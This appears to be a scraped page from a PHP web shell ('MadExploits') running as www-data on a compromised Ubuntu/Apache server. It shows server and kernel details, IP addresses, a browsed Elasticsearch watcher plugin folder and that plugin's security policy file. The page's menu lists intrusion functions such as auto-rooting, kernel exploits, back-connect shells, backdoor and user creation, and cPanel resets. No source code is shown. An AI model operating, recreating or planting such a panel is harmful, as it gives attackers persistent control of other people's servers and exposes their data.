Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.181
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
elasticsearch /
modules /
x-pack-watcher /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE.txt
3.77
KB
-rw-r--r--
NOTICE.txt
74.44
KB
-rw-r--r--
failureaccess-1.0.1.jar
4.51
KB
-rw-r--r--
guava-27.1-jre.jar
2.62
MB
-rw-r--r--
jakarta.activation-1.2.1.jar
64.15
KB
-rw-r--r--
jakarta.mail-1.6.4.jar
644.69
KB
-rw-r--r--
owasp-java-html-sanitizer-2019...
228.14
KB
-rw-r--r--
plugin-descriptor.properties
1.67
KB
-rw-r--r--
plugin-security.policy
703
B
-rw-r--r--
x-pack-watcher-7.15.1.jar
733.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin-security.policy
grant { // required to configure the custom mailcap for watcher permission java.lang.RuntimePermission "setFactory"; // needed when sending emails for javax.activation // otherwise a classnotfound exception is thrown due to trying // to load the class with the application class loader permission java.lang.RuntimePermission "setContextClassLoader"; permission java.lang.RuntimePermission "getClassLoader"; // TODO: remove use of this jar as soon as possible!!!! permission java.lang.RuntimePermission "accessClassInPackage.com.sun.activation.registries"; // needed for multiple server implementations used in tests permission java.net.SocketPermission "*", "accept,connect"; };
Close